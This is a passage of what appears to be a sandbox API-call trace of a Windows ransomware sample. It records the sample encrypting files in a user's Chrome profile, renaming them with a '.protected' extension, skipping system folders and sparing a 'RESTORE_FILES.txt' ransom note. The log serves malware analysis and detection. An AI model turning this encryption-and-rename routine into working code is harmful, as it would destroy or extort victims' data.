returned 1 [0084.369] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.370] CloseHandle (hObject=0x154) returned 1 [0084.372] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.protected") returned 99 [0084.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites.protected")) returned 1 [0084.373] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="Windows") returned -1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="Program Files") returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="Program Files (x86)") returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="$Recycle.bin") returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="System Volume Information") returned 1 [0084.373] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.373] StrStrIW (lpFirst="Top Sites-journal", lpSrch=".protected") returned 0x0 [0084.373] lstrcmpW (lpString1="Top Sites-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.373] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.373] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.374] StrStrW (lpFirst="Top Sites-journal", lpSrch=".txt") returned 0x0 [0084.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.374] StrStrW (lpFirst="Top Sites-journal", lpSrch=".rar") returned 0x0 [0084.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.374] StrStrW (lpFirst="Top Sites-journal", lpSrch=".zip") returned 0x0 [0084.374] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.374] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.374] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.375] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.375] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.375] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.376] CloseHandle (hObject=0x154) returned 1 [0084.376] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.protected") returned 107 [0084.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal.protected")) returned 1 [0084.377] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="Windows") returned -1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="Program Files") returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="Program Files (x86)") returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="$Recycle.bin") returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="System Volume Information") returned 1 [0084.377] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.377] StrStrIW (lpFirst="TransportSecurity", lpSrch=".protected") returned 0x0 [0084.377] lstrcmpW (lpString1="TransportSecurity", lpString2="RESTORE_FILES.txt") returned 1 [0084.377] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.378] StrStrW (lpFirst="TransportSecurity", lpSrch=".txt") returned 0x0 [0084.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.378] StrStrW (lpFirst="TransportSecurity", lpSrch=".rar") returned 0x0 [0084.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.378] StrStrW (lpFirst="TransportSecurity", lpSrch=".zip") returned 0x0 [0084.378] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x278, lpOverlapped=0x0) returned 1 [0084.386] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffd88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.386] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x278, lpOverlapped=0x0) returned 1 [0084.386] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.387] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.387] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.387] CloseHandle (hObject=0x154) returned 1 [0084.387] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.protected") returned 107 [0084.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity.protected")) returned 1 [0084.389] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="Windows") returned -1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="Program Files") returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="Program Files (x86)") returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="$Recycle.bin") returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="System Volume Information") returned 1 [0084.389] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.389] StrStrIW (lpFirst="Visited Links", lpSrch=".protected") returned 0x0 [0084.389] lstrcmpW (lpString1="Visited Links", lpString2="RESTORE_FILES.txt") returned 1 [0084.389] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.389] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.390] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.390] StrStrW (lpFirst="Visited Links", lpSrch=".txt") returned 0x0 [0084.390] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.390] StrStrW (lpFirst="Visited Links", lpSrch=".rar") returned 0x0 [0084.390] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.390] StrStrW (lpFirst="Visited Links", lpSrch=".zip") returned 0x0 [0084.391] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.393] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.393] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.393] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.394] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.394] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.394] CloseHandle (hObject=0x154) returned 1 [0084.394] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.protected") returned 103 [0084.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links.protected")) returned 1 [0084.395] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="Windows") returned -1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="Program Files") returned 1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="Program Files (x86)") returned 1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="Web Applications", lpString2="System Volume Information") returned 1 [0084.396] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned 96 [0084.396] lstrcmpW (lpString1="Web Applications", lpString2=".") returned 1 [0084.396] lstrcmpW (lpString1="Web Applications", lpString2="..") returned 1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*") returned 98 [0084.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.396] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.396] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.396] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.396] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\.") returned 98 [0084.396] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.396] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.396] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.396] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.396] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.396] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\..") returned 99 [0084.396] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.396] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.396] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="Windows") returned -1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="Program Files") returned -1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="Program Files (x86)") returned -1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="System Volume Information") returned -1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned 134 [0084.396] lstrcmpW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0084.397] lstrcmpW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0084.397] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*") returned 136 [0084.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0084.397] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.397] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.397] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.397] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.397] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.397] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\.") returned 136 [0084.397] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.397] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.398] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.398] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.398] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.398] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.398] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.398] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\..") returned 137 [0084.398] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.398] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.398] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="Windows") returned -1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="Program Files") returned -1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="Program Files (x86)") returned -1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="$Recycle.bin") returned 1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="System Volume Information") returned -1 [0084.398] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.398] StrStrIW (lpFirst="Google Docs.ico", lpSrch=".protected") returned 0x0 [0084.398] lstrcmpW (lpString1="Google Docs.ico", lpString2="RESTORE_FILES.txt") returned -1 [0084.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.399] StrStrW (lpFirst="Google Docs.ico", lpSrch=".txt") returned 0x0 [0084.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.399] StrStrW (lpFirst="Google Docs.ico", lpSrch=".rar") returned 0x0 [0084.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.399] StrStrW (lpFirst="Google Docs.ico", lpSrch=".zip") returned 0x0 [0084.399] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x2800, lpOverlapped=0x0) returned 1 [0084.405] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.405] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x2800, lpOverlapped=0x0) returned 1 [0084.405] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.405] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.406] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.407] CloseHandle (hObject=0x15c) returned 1 [0084.407] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.protected") returned 160 [0084.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.protected")) returned 1 [0084.408] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="Windows") returned -1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="Program Files") returned -1 [0084.408] lstrcmpiW (lpString1="Google 